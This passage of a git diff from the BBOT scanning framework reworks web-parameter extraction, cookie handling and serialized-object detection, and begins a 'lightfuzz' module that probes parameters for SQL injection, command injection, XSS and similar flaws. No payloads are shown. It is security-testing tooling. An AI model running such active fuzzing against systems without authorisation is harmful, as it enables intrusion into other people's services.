enumerate(strings): + s = s.replace('"', '\\"') + yara_string = f'$s{i} = "{s}"' + if nocase: + yara_string += " nocase" + 
yara_strings.append(yara_string)
+        yara_strings = "\n        ".join(yara_strings)
+
+        # Create the complete YARA rule
+        yara_rule = f"""
+rule strings_match
+{{
+    strings:
+        {yara_strings}
+    condition:
+        any of them
+}}
+"""
+        # Compile and return the rule
+        return self.compile(source=yara_rule)
+
+    def compile(self, *args, **kwargs):
+        return yara.compile(*args, **kwargs)
+
+    async def match(self, compiled_rules, text):
+        """
+        Given a compiled YARA rule and a body of text, return a list of strings that match the rule
+        """
+        matched_strings = []
+        matches = await self.parent_helper.run_in_executor(compiled_rules.match, data=text)
+        if matches:
+            for match in matches:
+                for string_match in match.strings:
+                    for instance in string_match.instances:
+                        matched_string = instance.matched_data.decode("utf-8")
+                        matched_strings.append(matched_string)
+        return matched_strings
diff --git a/bbot/core/modules.py b/bbot/core/modules.py
index c83d34a96f..4223327a5b 100644
--- a/bbot/core/modules.py
+++ b/bbot/core/modules.py
@@ -104,8 +104,9 @@ def add_module_dir(self, module_dir):
 
     def file_filter(self, file):
         file = file.resolve()
-        if "templates" in file.parts:
-            return False
+        for part in file.parts:
+            if part.endswith("_submodules") or part == "templates":
+                return False
         return file.suffix.lower() == ".py" and file.stem not in ["base", "__init__"]
 
     def preload(self, module_dirs=None):
@@ -158,12 +159,11 @@ def preload(self, module_dirs=None):
                     namespace = f"bbot.modules.{module_dir.name}"
                 try:
                     preloaded = self.preload_module(module_file)
+                    if preloaded is None:
+                        continue
                     module_type = "scan"
                     if module_dir.name in ("output", "internal"):
                         module_type = str(module_dir.name)
-                    elif module_dir.name not in ("modules"):
-                        flags = set(preloaded["flags"] + [module_dir.name])
-                        preloaded["flags"] = sorted(flags)
 
                     # derive module dependencies from watched event types (only for scan modules)
                     if module_type == "scan":
@@ -327,12 +327,28 @@ def preload_module(self, module_file):
         deps_apt = []
         deps_common = []
         ansible_tasks = []
+        config = {}
+        options_desc = {}
         python_code = open(module_file).read()
         # take a hash of the code so we can keep track of when it changes
         module_hash = sha1(python_code).hexdigest()
         parsed_code = ast.parse(python_code)
-        config = {}
-        options_desc = {}
+
+        # discard if the module isn't a valid BBOT module
+        is_bbot_module = False
+        for root_element in parsed_code.body:
+            if type(root_element) == ast.ClassDef:
+                for class_attr in root_element.body:
+                    if type(class_attr) == ast.Assign and any(
+                        target.id in ("watched_events", "produced_events") for target in class_attr.targets
+                    ):
+                        is_bbot_module = True
+                        break
+
+        if not is_bbot_module:
+            log.debug(f"Skipping {module_file} as it is not a valid BBOT module")
+            return
+
         for root_element in parsed_code.body:
             # look for classes
             if type(root_element) == ast.ClassDef:
diff --git a/bbot/modules/base.py b/bbot/modules/base.py
index 8d125c91c9..486f2de41e 100644
--- a/bbot/modules/base.py
+++ b/bbot/modules/base.py
@@ -533,8 +533,10 @@ async def emit_event(self, *args, **kwargs):
             if v is not None:
                 emit_kwargs[o] = v
         event = self.make_event(*args, **event_kwargs)
-        if event:
-            await self.queue_outgoing_event(event, **emit_kwargs)
+        if event is not None:
+            children = event.children
+            for e in [event] + children:
+                await self.queue_outgoing_event(e, **emit_kwargs)
         return event
 
     async def _events_waiting(self, batch_size=None):
diff --git a/bbot/modules/deadly/dastardly.py b/bbot/modules/dastardly.py
similarity index 98%
rename from 
bbot/modules/deadly/dastardly.py rename to bbot/modules/dastardly.py index 2677818161..b9dd772a73 100644 --- a/bbot/modules/deadly/dastardly.py +++ b/bbot/modules/dastardly.py @@ -5,7 +5,7 @@ class dastardly(BaseModule): watched_events = ["HTTP_RESPONSE"] produced_events = ["FINDING", "VULNERABILITY"] - flags = ["active", "aggressive", "slow", "web-thorough"] + flags = ["active", "aggressive", "slow", "web-thorough", "deadly"] meta = { "description": "Lightweight web application security scanner", "created_date": "2023-12-11", diff --git a/bbot/modules/deadly/ffuf.py b/bbot/modules/ffuf.py similarity index 99% rename from bbot/modules/deadly/ffuf.py rename to bbot/modules/ffuf.py index 63c8072c2b..81e114c7e7 100644 --- a/bbot/modules/deadly/ffuf.py +++ b/bbot/modules/ffuf.py @@ -9,7 +9,7 @@ class ffuf(BaseModule): watched_events = ["URL"] produced_events = ["URL_UNVERIFIED"] - flags = ["aggressive", "active"] + flags = ["aggressive", "active", "deadly"] meta = {"description": "A fast web fuzzer written in Go", "created_date": "2022-04-10", "author": "@liquidsec"} options = { diff --git a/bbot/modules/ffuf_shortnames.py b/bbot/modules/ffuf_shortnames.py index 83d1c13a13..db44ed1108 100644 --- a/bbot/modules/ffuf_shortnames.py +++ b/bbot/modules/ffuf_shortnames.py @@ -3,7 +3,7 @@ import random import string -from bbot.modules.deadly.ffuf import ffuf +from bbot.modules.ffuf import ffuf class ffuf_shortnames(ffuf): diff --git a/bbot/modules/httpx.py b/bbot/modules/httpx.py index 8edc4e1d69..21fa48d63d 100644 --- a/bbot/modules/httpx.py +++ b/bbot/modules/httpx.py @@ -3,6 +3,8 @@ import tempfile import subprocess from pathlib import Path +from http.cookies import SimpleCookie + from bbot.modules.base import BaseModule @@ -137,8 +139,20 @@ async def handle_batch(self, *events): if self.probe_all_ips: command += ["-probe-all-ips"] + # Add custom HTTP headers for hk, hv in self.scan.custom_http_headers.items(): command += ["-header", f"{hk}: {hv}"] + + # Add custom HTTP cookies as a single header + if self.scan.custom_http_cookies: + cookie = SimpleCookie() + for ck, cv in self.scan.custom_http_cookies.items(): + cookie[ck] = cv + + # Build the cookie header + cookie_header = f"Cookie: {cookie.output(header='', sep='; ').strip()}" + command += ["-header", cookie_header] + proxy = self.scan.http_proxy if proxy: command += ["-http-proxy", proxy] diff --git a/bbot/modules/hunt.py b/bbot/modules/hunt.py index bfd5c63200..6f3e619965 100644 --- a/bbot/modules/hunt.py +++ b/bbot/modules/hunt.py @@ -284,11 +284,29 @@ class hunt(BaseModule): async def handle_event(self, event): p = event.data["name"] + matching_categories = [] + + # Collect all matching categories for k in hunt_param_dict.keys(): if p.lower() in hunt_param_dict[k]: - description = f"Found potential {k.upper()} parameter [{p}]" - data = {"host": str(event.host), "description": description} - url = event.data.get("url", "") - if url: - data["url"] = url - await self.emit_event(data, "FINDING", event) + matching_categories.append(k) + + if matching_categories: + # Create a comma-separated string of categories + category_str = ", ".join(matching_categories) + description = f"Found potentially interesting parameter. 
Name: [{p}] Parameter Type: [{event.data['type']}] Categories: [{category_str}]" + + if ( + "original_value" in event.data.keys() + and event.data["original_value"] != "" + and event.data["original_value"] is not None + ): + description += ( + f" Original Value: [{self.helpers.truncate_string(str(event.data['original_value']), 200)}]" + ) + + data = {"host": str(event.host), "description": description} + url = event.data.get("url", "") + if url: + data["url"] = url + await self.emit_event(data, "FINDING", event) diff --git a/bbot/modules/internal/aggregate.py b/bbot/modules/internal/aggregate.py index 54e3a52ccc..3bd5be12da 100644 --- a/bbot/modules/internal/aggregate.py +++ b/bbot/modules/internal/aggregate.py @@ -2,6 +2,7 @@ class aggregate(BaseReportModule): + watched_events = [] flags = ["passive", "safe"] meta = { "description": "Summarize statistics at the end of a scan", diff --git a/bbot/modules/internal/excavate.py b/bbot/modules/internal/excavate.py index 69a1a32be3..d25fb2b9ae 100644 --- a/bbot/modules/internal/excavate.py +++ b/bbot/modules/internal/excavate.py @@ -63,6 +63,17 @@ def _exclude_key(original_dict, key_to_exclude): def extract_params_url(parsed_url): + """ + Yields query parameters from a parsed URL. + + Args: + parsed_url (ParseResult): The URL to extract parameters from. + + Yields: + tuple: Contains the hardcoded HTTP method ('GET'), parsed URL, parameter name, + original value, source (hardcoded to 'direct_url'), and additional parameters + (all parameters excluding the current one). + """ params = parse_qs(parsed_url.query) flat_params = {k: v[0] for k, v in params.items()} @@ -301,21 +312,35 @@ class excavateTestRule(ExcavateRule): } options = { - "retain_querystring": False, + "retain_querystring": True, "yara_max_match_data": 2000, "custom_yara_rules": "", + "speculate_params": False, } options_desc = { "retain_querystring": "Keep the querystring intact on emitted WEB_PARAMETERS", "yara_max_match_data": "Sets the maximum amount of text that can extracted from a YARA regex", "custom_yara_rules": "Include custom Yara rules", + "speculate_params": "Enable speculative parameter extraction from JSON and XML content", } scope_distance_modifier = None accept_dupes = False _module_threads = 8 - parameter_blacklist = { + parameter_blacklist_prefix = [ + "TS01", + "BIGipServer", + "incap_", + "visid_incap_", + "AWSALB", + "utm_", + "ApplicationGatewayAffinity", + "JSESSIONID", + "ARRAffinity", + ] + + parameter_blacklist = set( p.lower() for p in [ "__VIEWSTATE", @@ -327,18 +352,30 @@ class excavateTestRule(ExcavateRule): "__SCROLLPOSITIONY", "__SCROLLPOSITIONX", "ASP.NET_SessionId", - "JSESSIONID", "PHPSESSID", + "__cf_bm", + "f5_cspm", ] - } + ) yara_rule_name_regex = re.compile(r"rule\s(\w+)\s{") yara_rule_regex = re.compile(r"(?s)((?:rule\s+\w+\s*{[^{}]*(?:{[^{}]*}[^{}]*)*[^{}]*(?:/\S*?}[^/]*?/)*)*})") def in_bl(self, value): - return value.lower() in self.parameter_blacklist + # Check if the value is in the blacklist or starts with a blacklisted prefix. + lower_value = value.lower() + + if lower_value in self.parameter_blacklist: + return True + + for bl_param_prefix in self.parameter_blacklist_prefix: + if lower_value.startswith(bl_param_prefix.lower()): + return True + + return False def url_unparse(self, param_type, parsed_url): + # Reconstructs a URL, optionally omitting the query string based on retain_querystring configuration value. 
if param_type == "GETPARAM": querystring = "" else: @@ -392,7 +429,7 @@ def extract(self): yield ( self.output_type, parameter_name, - original_value, + original_value.strip(), action, _exclude_key(extracted_parameters_dict, parameter_name), ) @@ -405,7 +442,7 @@ class PostJquery(GetJquery): class HtmlTags(ParameterExtractorRule): name = "HTML Tags" - discovery_regex = r'/<[^>]+(href|src)=["\'][^"\']*["\'][^>]*>/ nocase' + discovery_regex = r'/<[^>]+(href|src|action)=["\']?[^"\'>\s]*["\']?[^>]*>/ nocase' extraction_regex = bbot_regexes.tag_attribute_regex output_type = "GETPARAM" @@ -413,48 +450,125 @@ def extract(self): urls = self.extraction_regex.findall(str(self.result)) for url in urls: parsed_url = urlparse(url) - query_strings = parse_qs(parsed_url.query) - query_strings_dict = { - k: v[0] if isinstance(v, list) and len(v) == 1 else v for k, v in query_strings.items() - } + query_strings = parse_qs(html.unescape(parsed_url.query)) + query_strings_dict = {k: v[0] if isinstance(v, list) else v for k, v in query_strings.items()} for parameter_name, original_value in query_strings_dict.items(): yield ( self.output_type, parameter_name, - original_value, + original_value.strip(), url, _exclude_key(query_strings_dict, parameter_name), ) + class AjaxJquery(ParameterExtractorRule): + name = "JQuery Extractor" + discovery_regex = r"/\$\.ajax\(\{[^\<$\$]*\}\)/s nocase" + extraction_regex = None + output_type = "BODYJSON" + ajax_content_regexes = { + "url": r"url\s*:\s*['\"](.*?)['\"]", + "type": r"type\s*:\s*['\"](.*?)['\"]", + "content_type": r"contentType\s*:\s*['\"](.*?)['\"]", + "data": r"data:.*(\{[^}]*\})", + } + + def extract(self): + # Iterate through each regex in ajax_content_regexes + extracted_values = {} + for key, pattern in self.ajax_content_regexes.items(): + match = re.search(pattern, self.result) + if match: + # Store the matched value in the dictionary + extracted_values[key] = match.group(1) + + # check to see if the format is defined as JSON + if "content_type" in extracted_values.keys(): + if extracted_values["content_type"] == "application/json": + form_parameters = {} + + # If we cant figure out the parameter names, there is no point in continuing + if "data" in extracted_values.keys(): + if "url" in extracted_values.keys(): + form_url = extracted_values["url"] + else: + form_url = None + + try: + s = extracted_values["data"] + s = re.sub(r"(\w+)\s*:", r'"\1":', s) # Quote keys + s = re.sub(r":\s*(\w+)", r': "\1"', s) # Quote values if they are unquoted + data = json.loads(s) + except (ValueError, SyntaxError): + return None + for p in data.keys(): + form_parameters[p] = None + + for parameter_name in form_parameters: + yield ( + "BODYJSON", + parameter_name, + None, + form_url, + _exclude_key(form_parameters, parameter_name), + ) + class GetForm(ParameterExtractorRule): name = "GET Form" discovery_regex = r'/]*\bmethod=["\']?get["\']?[^>]*>.*<\/form>/s nocase' - form_content_regexes = [ - bbot_regexes.input_tag_regex, - bbot_regexes.select_tag_regex, - bbot_regexes.textarea_tag_regex, - ] + form_content_regexes = { + "input_tag_regex": bbot_regexes.input_tag_regex, + "input_tag_regex2": bbot_regexes.input_tag_regex2, + "select_tag_regex": bbot_regexes.select_tag_regex, + "textarea_tag_regex": bbot_regexes.textarea_tag_regex, + "textarea_tag_regex2": bbot_regexes.textarea_tag_regex2, + "textarea_tag_novalue_regex": bbot_regexes.textarea_tag_novalue_regex, + "button_tag_regex": bbot_regexes.button_tag_regex, + "button_tag_regex2": bbot_regexes.button_tag_regex2, + 
"_input_tag_novalue_regex": bbot_regexes.input_tag_novalue_regex, + } extraction_regex = bbot_regexes.get_form_regex output_type = "GETPARAM" def extract(self): forms = self.extraction_regex.findall(str(self.result)) for form_action, form_content in forms: + if not form_action or form_action == "#": + form_action = None + + elif form_action.startswith("./"): + form_action = form_action.lstrip(".") + form_parameters = {} - for form_content_regex in self.form_content_regexes: + for form_content_regex_name, form_content_regex in self.form_content_regexes.items(): input_tags = form_content_regex.findall(form_content) + if input_tags: + # Normalize each input_tag to be a tuple of two elements + input_tags = [(tag if isinstance(tag, tuple) else (tag, None)) for tag in input_tags] + + if form_content_regex_name in [ + "input_tag_regex2", + "button_tag_regex2", + "textarea_tag_regex2", + ]: + # Swap elements if needed + input_tags = [(b, a) for a, b in input_tags] + for parameter_name, original_value in input_tags: + form_parameters.setdefault( + parameter_name, original_value.strip() if original_value else None + ) + + for parameter_name, original_value in form_parameters.items(): + yield ( + self.output_type, + parameter_name, + original_value, + form_action, + _exclude_key(form_parameters, parameter_name), + ) - for parameter_name, original_value in input_tags: - form_parameters[parameter_name] = original_value - - for parameter_name, original_value in form_parameters.items(): - yield ( - self.output_type, - parameter_name, - original_value, - form_action, - _exclude_key(form_parameters, parameter_name), - ) + class GetForm2(GetForm): + extraction_regex = bbot_regexes.get_form_regex2 class PostForm(GetForm): name = "POST Form" @@ -462,6 +576,21 @@ class PostForm(GetForm): extraction_regex = bbot_regexes.post_form_regex output_type = "POSTPARAM" + class PostForm2(PostForm): + extraction_regex = bbot_regexes.post_form_regex2 + + class PostForm_NoAction(PostForm): + name = "POST Form (no action)" + extraction_regex = bbot_regexes.post_form_regex_noaction + + # underscore ensure generic forms runs last, so it doesn't cause dedupe to stop full form detection + class _GenericForm(GetForm): + name = "Generic Form" + discovery_regex = r"/]*>.*<\/form>/s nocase" + + extraction_regex = bbot_regexes.generic_form_regex + output_type = "GETPARAM" + def __init__(self, excavate): super().__init__(excavate) self.parameterExtractorCallbackDict = {} @@ -473,7 +602,7 @@ def __init__(self, excavate): regexes_component_list.append(f"${r.__name__} = {r.discovery_regex}") regexes_component = " ".join(regexes_component_list) self.yara_rules["parameter_extraction"] = ( - rf'rule parameter_extraction {{meta: description = "contains POST form" strings: {regexes_component} condition: any of them}}' + rf'rule parameter_extraction {{meta: description = "contains Parameter" strings: {regexes_component} condition: any of them}}' ) async def process(self, yara_results, event, yara_rule_settings, discovery_context): @@ -496,12 +625,27 @@ async def process(self, yara_results, event, yara_rule_settings, discovery_conte self.excavate.debug( f"Found Parameter [{parameter_name}] in [{parameterExtractorSubModule.name}] ParameterExtractor Submodule" ) - endpoint = event.data["url"] if not endpoint else endpoint - url = ( - endpoint - if endpoint.startswith(("http://", "https://")) - else f"{event.parsed_url.scheme}://{event.parsed_url.netloc}{endpoint}" - ) + + # account for the case where the action is html encoded + if endpoint and 
( + endpoint.startswith("https://") + or endpoint.startswith("http://") + ): + endpoint = html.unescape(endpoint) + + # If we have a full URL, leave it as-is + if endpoint and endpoint.startswith(("http://", "https://")): + url = endpoint + + # The endpoint is usually a form action - we should use it if we have it. If not, default to URL. + else: + # Use the original URL as the base and resolve the endpoint correctly in case of relative paths + base_url = ( + f"{event.parsed_url.scheme}://{event.parsed_url.netloc}{event.parsed_url.path}" + ) + if self.excavate.retain_querystring and len(event.parsed_url.query) > 0: + base_url += f"?{event.parsed_url.query}" + url = urljoin(base_url, endpoint) if self.excavate.helpers.validate_parameter(parameter_name, parameter_type): if self.excavate.in_bl(parameter_name) is False: @@ -599,12 +743,13 @@ async def process(self, yara_results, event, yara_rule_settings, discovery_conte class SerializationExtractor(ExcavateRule): regexes = { - "Java": re.compile(r"[^a-zA-Z0-9\/+]rO0[a-zA-Z0-9+\/]+={0,2}"), - "DOTNET": re.compile(r"[^a-zA-Z0-9\/+]AAEAAAD\/\/[a-zA-Z0-9\/+]+={0,2}"), - "PHP_Array": re.compile(r"[^a-zA-Z0-9\/+]YTo[xyz0123456][a-zA-Z0-9+\/]+={0,2}"), - "PHP_String": re.compile(r"[^a-zA-Z0-9\/+]czo[xyz0123456][a-zA-Z0-9+\/]+={0,2}"), - "PHP_Object": re.compile(r"[^a-zA-Z0-9\/+]Tzo[xyz0123456][a-zA-Z0-9+\/]+={0,2}"), - "Possible_Compressed": re.compile(r"[^a-zA-Z0-9\/+]H4sIAAAAAAAA[a-zA-Z0-9+\/]+={0,2}"), + "Java": re.compile(r"[^a-zA-Z0-9\/+][\"']?rO0[a-zA-Z0-9+\/]+={0,2}"), + "Ruby": re.compile(r"[^a-zA-Z0-9\/+][\"']?BAh[a-zA-Z0-9+\/]+={0,2}"), + "DOTNET": re.compile(r"[^a-zA-Z0-9\/+][\"']?AAEAAAD\/\/[a-zA-Z0-9\/+]+={0,2}"), + "PHP_Array": re.compile(r"[^a-zA-Z0-9\/+][\"']?YTo[xyz0123456][a-zA-Z0-9+\/]+={0,2}"), + "PHP_String": re.compile(r"[^a-zA-Z0-9\/+][\"']?czo[xyz0123456][a-zA-Z0-9+\/]+={0,2}"), + "PHP_Object": re.compile(r"[^a-zA-Z0-9\/+][\"']?Tzo[xyz0123456][a-zA-Z0-9+\/]+={0,2}"), + "Possible_Compressed": re.compile(r"[^a-zA-Z0-9\/+][\"']?H4sIAAAA[a-zA-Z0-9+\/]+={0,2}"), } yara_rules = {} @@ -612,7 +757,7 @@ def __init__(self, excavate): super().__init__(excavate) regexes_component_list = [] for regex_name, regex in self.regexes.items(): - regexes_component_list.append(rf"${regex_name} = /\b{regex.pattern}/ nocase") + regexes_component_list.append(rf"${regex_name} = /\b{regex.pattern}/") regexes_component = " ".join(regexes_component_list) self.yara_rules["serialization_detection"] = ( f'rule serialization_detection {{meta: description = "contains a possible serialized object" strings: {regexes_component} condition: any of them}}' @@ -702,7 +847,7 @@ class URLExtractor(ExcavateRule): tags = "spider-danger" description = "contains tag with src or href attribute" strings: - $url_attr = /<[^>]+(href|src)=["\'][^"\']*["\'][^>]*>/ + $url_attr = /<[^>]+(href|src|action)=["\']?[^"\']*["\']?[^>]*>/ condition: $url_attr } @@ -749,7 +894,6 @@ async def process(self, yara_results, event, yara_rule_settings, discovery_conte if final_url: if self.excavate.scan.in_scope(final_url): urls_found += 1 - await self.report( final_url, event, @@ -812,6 +956,36 @@ async def extract_yara_rules(self, rules_content): for r in await self.helpers.re.findall(self.yara_rule_regex, rules_content): yield r + async def emit_web_parameter( + self, host, param_type, name, original_value, url, description, additional_params, event, context + ): + data = { + "host": host, + "type": param_type, + "name": name, + "original_value": original_value, + "url": url, + "description": 
description, + "additional_params": additional_params, + } + await self.emit_event(data, "WEB_PARAMETER", event, context=context) + + async def emit_custom_parameters(self, event, config_key, param_type, description_suffix): + # Emits WEB_PARAMETER events for custom headers and cookies from the configuration. + custom_params = self.scan.web_config.get(config_key, {}) + for param_name, param_value in custom_params.items(): + await self.emit_web_parameter( + host=event.parsed_url.hostname, + param_type=param_type, + name=param_name, + original_value=param_value, + url=self.url_unparse(param_type, event.parsed_url), + description=f"HTTP Extracted Parameter [{param_name}] ({description_suffix})", + additional_params=_exclude_key(custom_params, param_name), + event=event, + context=f"Excavate saw a custom {param_type.lower()} set [{param_name}], and emitted a WEB_PARAMETER for it", + ) + async def setup(self): self.yara_rules_dict = {} self.yara_preprocess_dict = {} @@ -823,6 +997,7 @@ async def setup(self): ] self.parameter_extraction = bool(modules_WEB_PARAMETER) + self.speculate_params = bool(self.config.get("speculate_params", False)) self.retain_querystring = False if self.config.get("retain_querystring", False) is True: @@ -903,10 +1078,9 @@ async def setup(self): async def search(self, data, event, content_type, discovery_context="HTTP response"): if not data: return None - decoded_data = await self.helpers.re.recursive_decode(data) - if self.parameter_extraction: + if self.parameter_extraction and self.speculate_params: content_type_lower = content_type.lower() if content_type else "" extraction_map = { "json": self.helpers.extract_params_json, @@ -918,62 +1092,74 @@ async def search(self, data, event, content_type, discovery_context="HTTP respon results = extract_func(data) if results: for parameter_name, original_value in results: - description = ( - f"HTTP Extracted Parameter (speculative from {source_type} content) [{parameter_name}]" + await self.emit_web_parameter( + host=str(event.host), + param_type="SPECULATIVE", + name=parameter_name, + original_value=original_value, + url=str(event.data["url"]), + description=f"HTTP Extracted Parameter (speculative from {source_type} content) [{parameter_name}]", + additional_params={}, + event=event, + context=f"excavate's Parameter extractor found a speculative WEB_PARAMETER: {parameter_name} by parsing {source_type} data from {str(event.host)}", ) - data = { - "host": str(event.host), - "type": "SPECULATIVE", - "name": parameter_name, - "original_value": original_value, - "url": str(event.data["url"]), - "additional_params": {}, - "assigned_cookies": self.assigned_cookies, - "description": description, - } - context = f"excavate's Parameter extractor found a speculative WEB_PARAMETER: {parameter_name} by parsing {source_type} data from {str(event.host)}" - await self.emit_event(data, "WEB_PARAMETER", event, context=context) return - for result in self.yara_rules.match(data=f"{data}\n{decoded_data}"): - rule_name = result.rule - if rule_name in self.yara_preprocess_dict: - await self.yara_preprocess_dict[rule_name](result, event, discovery_context) - else: - self.hugewarning(f"YARA Rule {rule_name} not found in pre-compiled rules") + # Initialize the list of data items to process + data_items = [] + + # Check if data and decoded_data are identical + if data == decoded_data: + data_items.append(("data", data)) # Add only one since both are the same + else: + data_items.append(("data", data)) + data_items.append(("decoded_data", 
decoded_data))
+
+        for label, data_instance in data_items:
+            # run the pre-compiled YARA rules over this data instance
+            for result in self.yara_rules.match(data=f"{data_instance}"):
+                rule_name = result.rule
+
+                # Skip specific operations for 'parameter_extraction' rule on decoded_data
+                if label == "decoded_data" and rule_name == "parameter_extraction":
+                    continue
+
+                # Check if rule processing function exists
+                if rule_name in self.yara_preprocess_dict:
+                    await self.yara_preprocess_dict[rule_name](result, event, discovery_context)
+                else:
+                    self.hugewarning(f"YARA Rule {rule_name} not found in pre-compiled rules")
 
     async def handle_event(self, event):
         if event.type == "HTTP_RESPONSE":
-            # Harvest GET parameters from URL, if it came directly from the target, and parameter extraction is enabled
-            if (
-                self.parameter_extraction is True
-                and self.url_querystring_remove is False
-                and str(event.parent.parent.module) == "TARGET"
-            ):
-                self.debug(f"Processing target URL [{urlunparse(event.parsed_url)}] for GET parameters")
-                for (
-                    method,
-                    parsed_url,
-                    parameter_name,
-                    original_value,
-                    regex_name,
-                    additional_params,
-                ) in extract_params_url(event.parsed_url):
-                    if self.in_bl(parameter_name) is False:
-                        description = f"HTTP Extracted Parameter [{parameter_name}] (Target URL)"
-                        data = {
-                            "host": parsed_url.hostname,
-                            "type": "GETPARAM",
-                            "name": parameter_name,
-                            "original_value": original_value,
-                            "url": self.url_unparse("GETPARAM", parsed_url),
-                            "description": description,
-                            "additional_params": additional_params,
-                        }
-                        context = f"Excavate parsed a URL directly from the scan target for parameters and found [GETPARAM] Parameter Name: [{parameter_name}] and emitted a WEB_PARAMETER for it"
-                        await self.emit_event(data, "WEB_PARAMETER", event, context=context)
-
-        data = event.data
+            if self.parameter_extraction is True:
+                # if parameter extraction is enabled, and we have custom cookies or headers, emit them as WEB_PARAMETER events
+                await self.emit_custom_parameters(event, "http_cookies", "COOKIE", "Custom Cookie")
+                await self.emit_custom_parameters(event, "http_headers", "HEADER", "Custom Header")
+
+                # if parameter extraction is enabled, and querystring removal is disabled, and the event is directly from the TARGET, create a WEB_PARAMETER for each GET parameter in the URL
+                if self.url_querystring_remove is False and str(event.parent.parent.module) == "TARGET":
+                    self.debug(f"Processing target URL [{urlunparse(event.parsed_url)}] for GET parameters")
+                    for (
+                        method,
+                        parsed_url,
+                        parameter_name,
+                        original_value,
+                        regex_name,
+                        additional_params,
+                    ) in extract_params_url(event.parsed_url):
+                        if self.in_bl(parameter_name) is False:
+                            await self.emit_web_parameter(
+                                host=parsed_url.hostname,
+                                param_type="GETPARAM",
+                                name=parameter_name,
+                                original_value=original_value,
+                                url=self.url_unparse("GETPARAM", parsed_url),
+                                description=f"HTTP Extracted Parameter [{parameter_name}] (Target URL)",
+                                additional_params=additional_params,
+                                event=event,
+                                context=f"Excavate parsed a URL directly from the scan target for parameters and found [GETPARAM] Parameter Name: [{parameter_name}] and emitted a WEB_PARAMETER for it",
+                            )
 
         # process response data
         body = event.data.get("body", "")
@@ -987,29 +1173,31 @@
 
         for header, header_values in headers.items():
             for header_value in header_values:
+                # Process 'set-cookie' headers to extract and emit cookies as WEB_PARAMETER events.
                 
if header.lower() == "set-cookie" and self.parameter_extraction: if "=" not in header_value: self.debug(f"Cookie found without '=': {header_value}") continue else: - cookie_name = header_value.split("=")[0] - cookie_value = header_value.split("=")[1].split(";")[0] + cookie_name, _, remainder = header_value.partition("=") + cookie_value = remainder.split(";")[0] - if self.in_bl(cookie_value) is False: + if self.in_bl(cookie_name) is False: self.assigned_cookies[cookie_name] = cookie_value - description = f"Set-Cookie Assigned Cookie [{cookie_name}]" - data = { - "host": str(event.host), - "type": "COOKIE", - "name": cookie_name, - "original_value": cookie_value, - "url": self.url_unparse("COOKIE", event.parsed_url), - "description": description, - } - context = f"Excavate noticed a set-cookie header for cookie [{cookie_name}] and emitted a WEB_PARAMETER for it" - await self.emit_event(data, "WEB_PARAMETER", event, context=context) + await self.emit_web_parameter( + host=str(event.host), + param_type="COOKIE", + name=cookie_name, + original_value=cookie_value, + url=self.url_unparse("COOKIE", event.parsed_url), + description=f"Set-Cookie Assigned Cookie [{cookie_name}]", + additional_params={}, + event=event, + context=f"Excavate noticed a set-cookie header for cookie [{cookie_name}] and emitted a WEB_PARAMETER for it", + ) else: self.debug(f"blocked cookie parameter [{cookie_name}] due to BL match") + # Handle 'location' headers to process and emit redirect URLs as URL_UNVERIFIED events. if header.lower() == "location": redirect_location = getattr(event, "redirect_location", "") if redirect_location: @@ -1040,18 +1228,17 @@ async def handle_event(self, event): additional_params, ) in extract_params_location(header_value, event.parsed_url): if self.in_bl(parameter_name) is False: - description = f"HTTP Extracted Parameter [{parameter_name}] (Location Header)" - data = { - "host": parsed_url.hostname, - "type": "GETPARAM", - "name": parameter_name, - "original_value": original_value, - "url": self.url_unparse("GETPARAM", parsed_url), - "description": description, - "additional_params": additional_params, - } - context = f"Excavate parsed a location header for parameters and found [GETPARAM] Parameter Name: [{parameter_name}] and emitted a WEB_PARAMETER for it" - await self.emit_event(data, "WEB_PARAMETER", event, context=context) + await self.emit_web_parameter( + host=parsed_url.hostname, + param_type="GETPARAM", + name=parameter_name, + original_value=original_value, + url=self.url_unparse("GETPARAM", parsed_url), + description=f"HTTP Extracted Parameter [{parameter_name}] (Location Header)", + additional_params=additional_params, + event=event, + context=f"Excavate parsed a location header for parameters and found [GETPARAM] Parameter Name: [{parameter_name}] and emitted a WEB_PARAMETER for it", + ) else: self.warning("location header found but missing redirect_location in HTTP_RESPONSE") if header.lower() == "content-type": diff --git a/bbot/modules/lightfuzz/lightfuzz.py b/bbot/modules/lightfuzz/lightfuzz.py new file mode 100644 index 0000000000..106805178d --- /dev/null +++ b/bbot/modules/lightfuzz/lightfuzz.py @@ -0,0 +1,200 @@ +import importlib +from bbot.modules.base import BaseModule + +from urllib.parse import urlunparse +from bbot.errors import InteractshError + + +class lightfuzz(BaseModule): + watched_events = ["URL", "WEB_PARAMETER"] + produced_events = ["FINDING", "VULNERABILITY"] + flags = ["active", "aggressive", "web-thorough", "deadly"] + + options = { + 
"force_common_headers": False, + "enabled_submodules": ["sqli", "cmdi", "xss", "path", "ssti", "crypto", "serial", "nosqli"], + "disable_post": False, + } + options_desc = { + "force_common_headers": "Force emit commonly exploitable parameters that may be difficult to detect", + "enabled_submodules": "A list of submodules to enable. Empty list enabled all modules.", + "disable_post": "Disable processing of POST parameters, avoiding form submissions.", + } + + meta = { + "description": "Find Web Parameters and Lightly Fuzz them using a heuristic based scanner", + "author": "@liquidsec", + "created_date": "2024-06-28", + } + common_headers = ["x-forwarded-for", "user-agent"] + in_scope_only = True + + _module_threads = 4 + + async def setup(self): + self.event_dict = {} + self.interactsh_subdomain_tags = {} + self.interactsh_instance = None + self.disable_post = self.config.get("disable_post", False) + self.enabled_submodules = self.config.get("enabled_submodules") + self.interactsh_disable = self.scan.config.get("interactsh_disable", False) + self.submodules = {} + + if not self.enabled_submodules: + return False, "Lightfuzz enabled without any submodules. Must enable at least one submodule." + + for submodule_name in self.enabled_submodules: + try: + submodule_module = importlib.import_module(f"bbot.modules.lightfuzz.submodules.{submodule_name}") + submodule_class = getattr(submodule_module, submodule_name) + except ImportError: + return False, f"Invalid Lightfuzz submodule ({submodule_name}) specified in enabled_modules" + self.submodules[submodule_name] = submodule_class + + interactsh_needed = any(submodule.uses_interactsh for submodule in self.submodules.values()) + + if interactsh_needed and not self.interactsh_disable: + try: + self.interactsh_instance = self.helpers.interactsh() + self.interactsh_domain = await self.interactsh_instance.register(callback=self.interactsh_callback) + except InteractshError as e: + self.warning(f"Interactsh failure: {e}") + return True + + async def interactsh_callback(self, r): + full_id = r.get("full-id", None) + if full_id: + if "." in full_id: + details = self.interactsh_subdomain_tags.get(full_id.split(".")[0]) + if not details["event"]: + return + # currently, this is only used by the cmdi submodule. Later, when other modules use it, we will need to store description data in the interactsh_subdomain_tags dictionary + await self.emit_event( + { + "severity": "CRITICAL", + "host": str(details["event"].host), + "url": 